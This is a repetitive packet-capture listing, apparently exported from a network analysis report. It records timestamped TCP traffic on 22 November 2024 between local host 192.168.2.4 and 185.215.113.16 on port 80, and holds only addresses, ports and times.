                                                                                                                                                                                                            Nov 22, 2024 04:26:27.051033974 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.051765919 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.051891088 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.051927090 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.052736044 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.052892923 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.052931070 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.053452015 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.053558111 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.053601980 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.054322958 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.054440975 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.054488897 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.055170059 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.055294037 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.055335999 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.056049109 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.056163073 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.056201935 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.056884050 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.056996107 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.057029009 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.057755947 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.058434963 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.058489084 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.061718941 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.061738014 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.061759949 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.061778069 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.061785936 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.061829090 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.061860085 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.061880112 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.061913967 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.062405109 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.062735081 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.062771082 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.063416958 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.063590050 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.063631058 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.064302921 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.064449072 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.064486980 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.065133095 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.065296888 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.065336943 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.065840006 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.066183090 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.066221952 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.066849947 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.067015886 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.067049026 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.067562103 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.067890882 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.067933083 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.068434954 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.068739891 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.068799019 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.069224119 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.069257975 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.069592953 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.069633007 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.070271015 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.070460081 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.070497036 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.071079969 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.071260929 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.071296930 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.071932077 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.072096109 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.072133064 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.072312117 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.072334051 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.072354078 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.072367907 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.072437048 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.072474003 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.073216915 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.073316097 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.073358059 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.074084044 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.074198008 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.074235916 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.074923992 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.075037003 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.075086117 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.075799942 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.075841904 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.075881004 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.076653004 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.076749086 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.076786041 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.077511072 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.077624083 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.077663898 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.078382969 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.078457117 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.078491926 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.079235077 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.079349041 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.079384089 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.080077887 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.080198050 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.080235004 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.080936909 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.081052065 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.081088066 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.081794024 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.081871033 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.081903934 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.085947037 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.100770950 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.209204912 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.209283113 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.209326982 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.209566116 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.209594965 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.209630013 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.210405111 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.210521936 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.210563898 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.211220980 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.241780996 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.241831064 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.241851091 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.242152929 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.242192984 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.242322922 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.242343903 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.242382050 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.243206024 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.243360996 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.243407965 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.244081020 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.244312048 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.244349957 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.244895935 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.245054007 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.245093107 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.245755911 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.245862007 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.245901108 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.246612072 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.246776104 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.246834040 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.247468948 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.247592926 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.247632980 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.248347998 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.248450994 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.248512030 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.249247074 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.249315023 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.249973059 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.250056982 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.250153065 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.250237942 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.250902891 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.251027107 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.251064062 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.251770020 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.251857996 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.251899004 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.252648115 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.252728939 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.252768040 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.253482103 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.253541946 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.253580093 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.254338980 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.254451036 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.254498959 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.255232096 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.255331993 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.255378008 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.256112099 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.256216049 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.256309986 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.256921053 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.257033110 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.257066965 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.257771969 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.257874966 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.258187056 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.258632898 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.258747101 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.258858919 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.259493113 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.259553909 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.259732962 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.260345936 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.260421991 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.261029005 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.261202097 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.261312008 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.261358976 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.262094021 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.262295961 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.262336969 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.262944937 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.263051987 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.263092995 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.263827085 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.263943911 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.264059067 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.264647961 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.264765978 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.264805079 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.265497923 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.265609026 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.265748024 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.266388893 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.266486883 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.266601086 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.267235041 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.267280102 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.267329931 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.268107891 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.268228054 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.268676043 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.268950939 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.269062042 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.269100904 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.269805908 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.269923925 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.269963026 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.270658016 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.270776987 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.270814896 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.271522999 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.271636963 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.272375107 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.272413015 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.272465944 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.272505045 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.273251057 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.273358107 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.273396969 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.274130106 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.274260998 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.274301052 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.274961948 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.275083065 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.275120974 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.275841951 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.275933027 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.276681900 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.276721954 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.276782036 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.276820898 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.277534008 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.277656078 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.277698040 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.278388023 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.278469086 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.278507948 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.279253960 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.279362917 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.279479980 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.280097008 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.280215979 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.280250072 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.280983925 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.281120062 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.281158924 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.281837940 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.281935930 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.282100916 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.282726049 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.282830000 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.282877922 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.283552885 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.283616066 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.283804893 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.341475010 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.452970982 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.453018904 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.453062057 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.453301907 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.453383923 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.453579903 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.453980923 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:27.454092026 CET8049744185.215.113.16192.168.2.4
